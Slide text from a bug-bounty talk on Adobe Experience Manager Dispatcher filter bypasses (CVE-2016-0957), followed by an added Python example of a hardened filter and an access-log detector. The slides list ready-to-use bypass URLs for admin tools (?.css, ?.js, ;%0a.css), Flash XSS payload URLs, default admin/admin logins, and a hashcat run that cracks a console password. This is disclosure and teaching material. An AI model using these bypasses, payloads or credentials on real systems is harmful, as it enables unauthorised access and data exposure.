- @fransrosen A story of the passive aggressive sysadmin of AEM or "How to make a talk in 3h 35min"
- 3. Frans Rosén, bug bounties! labs.detectify.com, twitter.com/fransrosen. I blogged about Subdomain Takeovers. Donald Trump got hacked; the hacker referred to my post as his inspiration. I broke Let’s Encrypt. Live hacking! I won a boxing belt once. Namedropped in ytcracker - green hat
- 6. 2016 – Peter Adkins, https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html: CVE-2016-0957, "The world’s lamest RCE."
- 7. How AEM is structured (https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html)
- 10. How AEM is structured: Adobe "black magic glue"; stuff you pay your consultants for; shit no one’s updating
- 17. How AEM is structured: Apache HTTP server module (reverse proxy + filter); pages + metadata + content; a bunch of admin-tools. You should not have access to this. Or this.
- 21. Creating pages: the author creates a new page in the repo, it goes through the publisher nodes, and the Dispatcher serves the content
- 25. Accessing pages: the Dispatcher gets the URL, it goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try), and if all is OK it is served from a publish node
- 26. CVE-2016-0957 aka "I am two years old but I’m inside an enterprise product that no one can or dares to upgrade"
- 33. CVE-2016-0957: Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 34. This is ridiculous
- 37. Accessing pages with ?.css: the Dispatcher gets the URL?.css, every time is OK time, serve from publish node
- 38. Publish nodes
- 39. Disk usage: /etc/reports/diskusage.html?.css (Disk Usage lists all repo dirs + metadata)
- 41. My fav, opensocial proxy: /libs/opensocial/proxy?url=x&.css
- 42. …but there’s more!
- 43. CRX Explorer: /crx/de/index.jsp?.css
- 44. CRX Explorer: /crx/explorer/browser/index.jsp?.css
- 45. CRX Explorer Search: /crx/explorer/browser/index.jsp?.css
- 46. Content Repository Extreme: /crx/explorer/index.jsp?.css
- 47. Package Manager: /crx/packmgr/index.jsp?.css
- 48. Namespace Editor (no auth needed!): /crx/explorer/ui/namespace_editor.jsp?.css
- 50. bin/querybuilder: /bin/querybuilder.json?.css
- 53. bin/querybuilder for SWFs!
- 61. FLASHFEST in AEM CORE (thx Neal Poole):
  - /etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//
  - /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=jav%gascript:confirm(document.domain)
  - /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String
  - /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
  - /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
  - /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window
  - /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//
  - /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window
- 64. Allowing anonymous publish access 🤦
- 65. But Peter mentioned RCE?
- 67. RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html: admin / admin
- 69. RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 73. Patch for CVE-2016-0957. WOHO! WOHO! THEN WHAT IS THE PROBLEM?
- 76. Problem 1 🤦 PRIORITY: nah, bro
- 78. Problem 2 💸 💸 💸 💸 💸 💸
- 82. Patch for CVE-2016-0957, IRL version
- 83. Bypasses, seriously: ?.js and ;%0a.css. Thank Jasmin Landry for this one
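The filter weakness the slides describe (an allow rule that matches an extension anywhere in the request line, so ?.css, ?.js and ;%0a.css carry admin URLs through) shown beside a check that decides on the normalised path, plus a detector over access-log lines, as an added Python example that is not from the talk and not Adobe's Dispatcher code; the prefix lists, the extension allow-list, the log format and the log lines are assumptions and constructed samples.

```python
from urllib.parse import urlsplit, unquote

# Admin/author trees named in the talk; treating them as a deny-list is an assumption.
ADMIN_PREFIXES = ("/crx/", "/system/console", "/bin/querybuilder",
                  "/libs/opensocial/proxy", "/etc/reports/")
PUBLIC_PREFIXES = ("/content/", "/etc/clientlibs/")        # assumed public trees
ALLOWED_EXTENSIONS = {"html", "css", "js", "png", "json"}  # assumed allow-list

def weak_filter(request_line: str) -> bool:
    """Models an allow rule globbed over the whole request line (e.g. '* *.css *')."""
    return any("." + ext in request_line for ext in ALLOWED_EXTENSIONS)

def normalised_path(target: str) -> str:
    """Decoded path only: query string and ';' path parameters are dropped first."""
    return unquote(urlsplit(target).path).split(";", 1)[0]

def hardened_filter(request_line: str) -> bool:
    """Deny admin trees by prefix, allow only public trees, read the extension from the path."""
    method, target, _ = request_line.split(" ", 2)
    path = normalised_path(target)
    if path.startswith(ADMIN_PREFIXES) or not path.startswith(PUBLIC_PREFIXES):
        return False
    name = path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return method == "GET" and ext in ALLOWED_EXTENSIONS

def suspicious_requests(log_lines):
    """Flag entries (Apache common log format assumed) that hit an admin tree or whose
    query/path-parameter tail ends in an allowed extension, the shape of the bypass."""
    hits = []
    for line in log_lines:
        target = line.split('"', 2)[1].split(" ")[1]
        path = normalised_path(target)
        tail = unquote(target)[len(path):]  # whatever followed the real path
        reasons = []
        if path.startswith(ADMIN_PREFIXES):
            reasons.append("admin path")
        if any(tail.endswith("." + ext) for ext in ALLOWED_EXTENSIONS):
            reasons.append("extension appended after path")
        if reasons:
            hits.append((path, ", ".join(reasons)))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not taken from any real system
    '10.0.0.5 - - [13/Sep/2018:11:59:23 +0000] "GET /content/site/en.html HTTP/1.1" 200 812',
    '10.0.0.5 - - [13/Sep/2018:11:59:24 +0000] "GET /crx/de/index.jsp?.css HTTP/1.1" 200 4120',
    '10.0.0.5 - - [13/Sep/2018:11:59:25 +0000] "GET /bin/querybuilder.json;%0a.css HTTP/1.1" 200 9001',
    '10.0.0.7 - - [13/Sep/2018:12:00:01 +0000] "GET /etc/clientlibs/foundation/main.css HTTP/1.1" 200 300',
]
```

Running `suspicious_requests(SAMPLE_LOG)` over the constructed log flags the two admin requests and leaves the two legitimate ones alone.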
- 86. The passive aggressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
- 87. I’ve seen this before
- 88. AEM
- 89. CRX
- 90. CRXDE
- 91. All other stuff
- 94. /system/console: admin / admin
- 95. Report!
- 99. Search time!
- 100. WTF
- 102. WTF: $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a0825798
- 104. hashcat ftw: $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018
- 105. hashcat ftw: ih8uall
- 107. /system/console: admin / ih8uall
- 112. Report 2
- 113. Public bug bounty programs with AEM: public responsible disclosure 📼; private ones 🏨 💊💵
- 114. Thanks!